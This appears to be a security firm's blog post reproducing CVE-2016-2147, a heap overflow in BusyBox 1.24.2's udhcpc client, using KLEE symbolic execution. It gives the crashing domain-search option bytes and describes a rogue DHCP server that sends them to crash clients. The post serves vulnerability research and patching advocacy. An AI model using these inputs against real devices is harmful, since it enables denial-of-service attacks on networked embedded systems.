Replicating CVEs with KLEE

This blog post details the steps taken to replicate a udhcpc process crash on BusyBox 1.24.2 using NVD – CVE-2016-2147 (nist.gov), and to produce a working denial of service exploit. We will be using the symbolic execution engine called KLEE to help identify parameters that can cause the specific crash we are interested in.

This proof of concept helps demonstrate to clients that these bugs are actually exploitable as opposed to being a theoretical threat. Now let’s get started with some background.

Background

BusyBox

So, what is BusyBox?

BusyBox is a software suite that provides several Unix utilities in a single executable file. It runs in a variety of POSIX environments such as Linux, Android, and FreeBSD, although many of the tools it provides are designed to work with interfaces provided by the Linux kernel. It was specifically created for embedded operating systems with very limited resources.

Extract from BusyBox – Wikipedia

One of the utilities provided by BusyBox is a DHCP Client (udhcpc).  This very small DHCP client can be used to lease an IP address for a period of time.  Our aim is to crash this DHCP client by crafting a malicious DHCP response.

Existing CVE’s

There are a number of CVE’s for this executable but the one we will be focusing our attention on is CVE-2016-2147.

CVE-2016-2147 describes how an integer overflow in the DHCP client (udhcpc) in BusyBox versions before 1.25.0, allows remote attackers to cause a denial of service (crash) via a malformed RFC1035-encoded domain name, which triggers an out-of-bounds heap write.

Find the Fix

So, the first thing to take a look at is the patch for the CVE if one exists.  A quick search through the BusyBox source code downloads page, leads to the folder Index of /downloads/fixes-1.24.2 (busybox.net).

This folder contains all the patches for version 1.24.2 of BusyBox.  After examining the patches, we realized that the patches were labelled with the wrong CVE number.  So, the patch for CVE-2016-2147 is actually in the file busybox-1.24.2-CVE-2016-2148.patch.

Looking at the patch one of the issues seems to be with writing a space character at the end of the destination (highlighted in the above image).  This can be caused by the variable len’ being zero, hence the additional check added to the ‘if’ statement in the patch.

Tech Tip:

From a defensive programming point of view, the check should probably have been len > 0 as I doubt negative numbers would be helpful in this situation.

Let’s now examine the call path to the function dname_dec to see how we can control the parameters passed into the function.  The main function udhcpc_main calls udhcp_run_script several times based on the changes in protocol state.  So, all we need to do is send a reply that contains the option 119 (0x77) which is a ‘domain search’ string option in the DHCP protocol.

Function Call Hierarchy:

udhcpc_main() -> udhcp_run_script() -> fill_envp() -> xmalloc_optname_optval() -> dname_dec()

Hunt the Bug

Now let’s look at the code for the function dname_dec in version 1.24.2 of BusyBox where the bug occurs.

What input is going to be required to execute line 82 in the code above with the variable len’ set to zero or less.  While this function is relatively small it is a maintenance nightmare!  There are several pointers, magic numbers and offsets being used which make it difficult to read and understand.  We can determine what the function is supposed to do by referring to the domain names spec RFC1035.

Code Readability:

crtpos = ((c[0] & 0x3f) << 8) | c[1];

The above line of code is not very readable!

By defining a couple of macros, renaming variables and replacing line 60 in dname_dec with the example below, makes the cryptic line above much easier to understand. It also prevents typos as this code is used elsewhere in the file.

The function name itself is also very ambiguous. For example, decompress_domain_names would be an improvement as the _dec in dname_dec could mean decode, decrement or decrypt, and the initial ‘d’ could be anything.



Example:

#define POINTER_OFFSET_HIGH_BYTE_MASK 0x3f
#define EXTRACT_POINTER_OFFSET(ptr) (((ptr[0] & POINTER_OFFSET_HIGH_BYTE_MASK) << 8) | ptr[1])

currentByteOffset = EXTRACT_POINTER_OFFSET(currentBytePtr);

So how are we going to work out the parameters of the function dname_dec that will cause it to crash?  We could try and figure out a path through the function and the associated parameter values required by hand, but this could prove difficult for complex functions. Or we could use a tool like KLEE.

This is where KLEE the symbolic execution engine comes to the rescue.  As the dname_dec function doesn’t require any global variables and is self-contained, we can create a small test program, and get KLEE to determine the inputs to the function that will potentially cause it to crash.

These few lines of C code are all that’s required in addition to the dname_dec function itself.  Note that the len’ parameter has been defined as a char even though the function dname_dec specifies it as an integer.  This is because in the DHCP protocol the options have a one-byte length.  Although the function will accept larger numbers the protocol limits us to a single byte.  This will stop KLEE generating inputs that we can’t actually send into the function via a DHCP message.  Now we need to compile the code using clang and then run it using KLEE.

Compile:
Clang -emit-llvm -g -c test.c -o test.bc
Run:
Klee –libc=uclibc –posix-runtime test.bc

Within a few seconds of running KLEE a number of errors are found.

These are not related to the CVE so we let KLEE continue.  After about one minute KLEE finds an input that causes the line of code we are interested in to be executed (line 82).  This is another out of bound pointer error.

All we have to do now is use the ktest-tool in KLEE to show the input that caused the error.  This is done by finding the error file that relates to the line of code we are interested in, and then using the ktest-tool with the associated ktest file as show below. The error files are in the same order as they are discovered.

From the output of the ktest-tool we can see what the function dname_dec arguments were set to in order to reach line 82 of the code.

Parameters:
Name variable set to: '\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
Len variable set to: 0x03

The Exploit

Now we need to write a simple Python script to listen for the DHCP Discover broadcast message from the udhcpc client and then reply with DHCP Offer and Ack messages. The DHCP Ack message will contain the ‘domain search‘ option set to the values discovered by KLEE.

We can use docker to create a test environment with the required version of BusyBox.

Docker BusyBox Test Environment:

docker pull busybox:1.24.2
docker run -ti <busybox container id>

Below is the Python code for our UDP server.

With our UDP server running, any time the BusyBox udhcpc process runs it will crash with a segmentation fault as show below.

The Wireshark capture below shows our special ‘domain search’ option containing the values discovered by KLEE.

Conclusion

This example highlights the importance of keeping software patched and up to date. It prevents known bugs from being exploited that have already been fixed in later releases of the software.

Tools like KLEE can also be used during the development phase of a project to help prevent software being released with these types of bugs in the first place.